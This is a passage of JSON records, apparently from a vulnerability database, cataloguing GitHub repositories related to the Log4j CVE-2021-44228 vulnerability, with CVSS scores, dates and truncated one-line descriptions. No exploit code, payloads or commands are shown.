"impactScore": 6.0}, "published": "2022-01-09T13:38:38", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-30T06:01:01", "id": "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-12T21:06:55", "description": "# Healer...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-09T21:49:33", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-12T18:34:08", "id": "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:36", "description": "# Workaround for CVE-2021-44228 (Log4j RCE exploit) as a buildpa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T23:34:52", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-06T19:08:01", "id": "EA3173CE-C426-5047-864A-480B1A30F235", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-02T09:13:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T15:42:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T14:01:16", "id": "6600C311-30E5-566D-98F1-AC47E752EBEA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:54", "description": "# log4j Spring vulnerable POC\n\nThis is a POC for a simple spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T15:00:58", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T22:15:47", "id": "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:27:19", "description": "# log4j-scanner\n# CVE-2021-44228\nSimp...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T08:51:56", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:40", "id": "0A26B4F0-3175-58BE-9CE7-133C9D85E181", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:37:10", "description": "# Sample Log4j2 vulnerable application (CVE-2021-44228) \n# Versi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T13:00:38", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T04:00:49", "id": "D813949A-183D-55ED-AF64-B130B8F95A56", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:41", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:07:41", "description": "# POC for CVE-2021-44228\n\nThis python script was created while I...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:40:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:40:47", "id": "F2F2719B-7041-5D1A-A95A-7617360B1D08", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:28:09", "description": "# log4j_checker_beta - Linux, macOS and Windows Scripts\n\nIf you ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T04:14:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:40", "id": "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T05:33:31", "description": "## Overview\nThis guide shows how to setup Git in your machine an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T01:53:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T03:11:56", "id": "6F251270-3935-58F4-835C-C9D26FA97CD6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:31:29", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\nhttps://twitter...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T05:23:44", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-16T21:49:33", "id": "473FFDA9-E615-53B6-9A81-F98A1ABD700E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:54", "description": "# Security Log4J Tester\n\nA vulnerability in Apache Log4j, a wide...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:46:08", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T15:04:49", "id": "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-08-04T07:51:30", "description": "# CVE-2021-44228-Test-Server\nA small server for verifing if a gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T12:35:30", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-08-04T05:22:46", "id": "4142DC43-FEB5-5B62-B8C7-B2A4DEB336A6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:26:58", "description": "# log4j-scanner\nA Log4j vulnerability scanner is automated scann...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-17T11:01:24", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-11-10T04:02:56", "id": "9B0163DC-EE41-5E66-9AA8-A960262A2072", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-07-23T06:09:46", "description": "# Log4Shell POC Demo\n\nThis repository contains a submodule, clon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T04:20:40", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-07-23T00:49:26", "id": "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T05:08:10", "description": "# Log4j Vulnerability - Proof-of-concept\n\nThis repo has the dock...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:50:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T02:11:16", "id": "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-09T20:21:06", "description": "# CVE-2021-44228-Advisories\nPlease open Issues to include an adv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:41:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T20:08:19", "id": "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:23", "description": "# Log4Shell-IOCs\nIOC feeds curated by WatchGuard Threat Lab that...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T15:58:14", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T15:59:33", "id": "034AFC0C-D411-5F4A-BBAB-630A6C972933", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-09-15T09:11:37", "description": "# Log4jHorizon\n\nExploiting CVE-2021-44228 in VMWare Horizon for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T22:25:42", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-09-15T08:04:30", "id": "EA906824-9149-507D-893C-87A7FED8998B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:22:06", "description": "# jankybank\nInspired by and ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 